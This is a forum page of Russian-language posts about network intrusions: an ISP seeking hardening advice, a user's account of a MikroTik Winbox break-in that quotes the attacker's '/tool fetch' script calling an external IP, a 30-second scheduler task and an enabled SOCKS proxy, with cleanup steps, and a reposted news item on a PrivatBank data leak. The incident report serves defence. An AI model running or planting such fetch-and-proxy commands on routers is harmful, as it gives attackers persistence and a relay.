-
Зараз на сторінці 0 користувачів
Немає користувачів, що переглядають цю сторінку.
-
Схожий контент
-
Від KGroup
Доброго времени суток коллеги.
Такая проблема случилось...
Взломали сеть - положили биллинг и микротик основной.
Также сдохло железо (программно) все что касается оборудования микротик и юбикюти.
Восстанавливаем уже третьи сутки.
Вопрос:
Как дальше обезопасить сеть? Какое железо и ПО преобрести чтобы упредить данные неприятные инсинуации.
Офтоп... просьба не поддергивать и не писать нелепые сообщения, попросту помочь советом.
Заранее спасибо.
-
Від userok
Без лишних подробностей. ссыль
Очередной раз через уязвимость winbox на одной из последних прошивках 6.41.3 якобы безопасных был взломан микротик на раз-два!
Суть проблемы — вход злоумышленника через winbox с ip 95.154.216.160 абсолютно без проблем, в моём случае 2 неудачных попытки входа и 3-й успешный вход под второй учёткой со сложным паролем нигде не засвеченным.
Под этим логином не входили никогда, создана учётка про запас на случай потери основного пароля.
Далее после входа злоумышленник на микротике:
1. Создаёт скрипт script1_
/tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http
2. Создаёт в планировщике задание каждые 30 секунд выполнять скрипт script1_
3. Включает IP-> Socks
/ip socks> print enabled: yes port: 4145 connection-idle-timeout: 2m max-connections: 200
Самое интересное то, что файл mikrotik.php пустой, либо это значит что это только предупреждение об уязвимости, либо всётаки конфиг ушёл в английское королевство.
Пока непонятно как такое могло быть?!
Что делать ели Ваш микротик взломан таким образом?
Надо изначально было не давать доступ к winbox из внешней сети, разрешить только с определённых айпи.
Удалить скрипт и задание планировщика.
Выключить носки) Ip->Socks
Менять пароли
Шиться новой прошивкой, но не факт что она уже есть с фиксом)
-
Від zaborovsky
Утечка данных якобы произошла 12 сентября. Иллюстрация REUTERS Сервера ПриватБанка взломаны, а личные данные клиентов — ушли в Россию, сообщает sprotyv.info со ссылкой на «Vse.Media». В распоряжение сайта попали скрин-шоты внутренней переписки сотрудников департамента ИТ-безопасности ПриватБанка. В своем чате они обсуждают взлом серверов банка и выкачку оттуда данных о клиентах на внешние сервера. Утечка данных произошла 12 сентября. Первые данные о ней сотрудиники ИТ-безопаности фиксируют в 8:42, и почти полтора часа не могут принять решение о прерывании копирования информации, так как на связи нет руководства. В 10:09 один из сотрудников ПриватБанка пишет коллегам, что в скачиваемом файле видны даты рождения, номера телефонов и «еще куча непонятной информации». Тогда же ИТ-шники фиксируют, что данные уходят на сервера, зарегистрированные в России. Их руководитель появляется на связи только к 10:29 по киевскому времени — и только тогда дает указание «обрубить копирование», но к этому моменту все файлы уже скопированы и выведены из банка.
Подробности читайте на УНИАН: https://economics.unian.net/finance/2267726-v-sentyabre-byili-vzlomanyi-serveryi-odnogo-iz-ukrainskih-bankov-smi.html
Рекомендованные сообщения
Создайте аккаунт или войдите в него для комментирования
Вы должны быть пользователем, чтобы оставить комментарий
Создать аккаунт
Зарегистрируйтесь для получения аккаунта. Это просто!
Зарегистрировать аккаунтВхід
Уже зарегистрированы? Войдите здесь.
Войти сейчас